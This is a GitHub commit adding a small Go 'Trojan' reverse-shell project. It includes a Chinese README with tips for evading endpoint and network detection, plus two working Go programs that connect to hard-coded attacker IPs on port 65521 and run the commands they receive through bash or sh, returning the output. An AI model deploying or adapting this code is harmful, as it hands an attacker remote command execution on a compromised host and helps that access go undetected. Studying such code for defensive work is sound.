-
Notifications
You must be signed in to change notification settings - Fork 0
Commit
This commit does not belong to any branch on this repository, and may belong to a fork outside of the repository.
- Loading branch information
Showing
4 changed files
with
89 additions
and
0 deletions.
There are no files selected for viewing
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Original file line number | Diff line number | Diff line change |
|---|---|---|
| @@ -0,0 +1,9 @@ | ||
| # Go 反向Shell | ||
|
|
||
| 靶机执行程序尝试与攻击机目标端口建立连接,攻击机监听端口,当攻击机接收到连接请求时,攻击机与靶机建立连接; | ||
|
|
||
| 攻击机发送给靶机的信息被靶机接收后调用 `cmd/shell` 执行,执行结果返回给攻击机。 | ||
|
|
||
| > 这个基础的反弹Shell很容易检测,终端侧可以检测套接字重定向到shell的行为,网络侧可以检测新的tcp连接中的恶意命令 | ||
| > - 网络侧可以通过加密通信流量来绕过检测 | ||
| > - 终端侧感觉可以包个进程,或是用些系统自带的其他能执行命令的程序来绕过检测 |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Original file line number | Diff line number | Diff line change |
|---|---|---|
| @@ -0,0 +1,2 @@ | ||
| msedge* | ||
| build.sh |
40 changes: 40 additions & 0 deletions
40
Security/EndPoint/Trojan/Go/ReverseShell/linux/bash/linux.go
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Original file line number | Diff line number | Diff line change |
|---|---|---|
| @@ -0,0 +1,40 @@ | ||
| package main | ||
|
|
||
| import ( | ||
| "bufio" | ||
| "bytes" | ||
| "fmt" | ||
| "net" | ||
| "os/exec" | ||
| "strings" | ||
| "syscall" | ||
| ) | ||
|
|
||
| func main() { | ||
| conn, err := net.Dial("tcp", "192.168.1.211:65521") | ||
| if err != nil { | ||
| fmt.Println(err) | ||
| return | ||
| } | ||
| for { | ||
| message, _ := bufio.NewReader(conn).ReadString('\n') | ||
| cmd := exec.Command("bash", "-c", strings.TrimSuffix(message, "\n")) | ||
| cmd.SysProcAttr = &syscall.SysProcAttr{Setpgid: true} | ||
| out, err := cmd.Output() | ||
|
|
||
| if err != nil { | ||
| fmt.Fprintf(conn, "%s\n", err) | ||
| } | ||
| fmt.Fprintf(conn, "%s\n", outputToString(out)) | ||
|
|
||
| // 收到 exit 命令或者 Ctrl+C(空),关闭连接 | ||
| if strings.TrimSuffix(message, "\n") == "exit" || message == "" { | ||
| conn.Close() | ||
| return | ||
| } | ||
| } | ||
| } | ||
|
|
||
| func outputToString(output []byte) string { | ||
| return string(bytes.Trim(output, "\r\n")) | ||
| } |
38 changes: 38 additions & 0 deletions
38
Security/EndPoint/Trojan/Go/ReverseShell/linux/sh/linux_sh.go
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Original file line number | Diff line number | Diff line change |
|---|---|---|
| @@ -0,0 +1,38 @@ | ||
| package main | ||
|
|
||
| import ( | ||
| "bufio" | ||
| "bytes" | ||
| "fmt" | ||
| "net" | ||
| "os/exec" | ||
| "strings" | ||
| ) | ||
|
|
||
| func main() { | ||
| conn, err := net.Dial("tcp", "100.1.1.131:65521") | ||
| if err != nil { | ||
| fmt.Println(err) | ||
| return | ||
| } | ||
| for { | ||
| message, _ := bufio.NewReader(conn).ReadString('\n') | ||
| cmd := exec.Command("sh", "-c", strings.TrimSuffix(message, "\n")) | ||
| out, err := cmd.Output() | ||
|
|
||
| if err != nil { | ||
| fmt.Fprintf(conn, "%s\n", err) | ||
| } | ||
| fmt.Fprintf(conn, "%s\n", outputToString(out)) | ||
|
|
||
| // 收到 exit 命令或者 Ctrl+C(空),关闭连接 | ||
| if strings.TrimSuffix(message, "\n") == "exit" || message == "" { | ||
| conn.Close() | ||
| return | ||
| } | ||
| } | ||
| } | ||
|
|
||
| func outputToString(output []byte) string { | ||
| return string(bytes.Trim(output, "\r\n")) | ||
| } |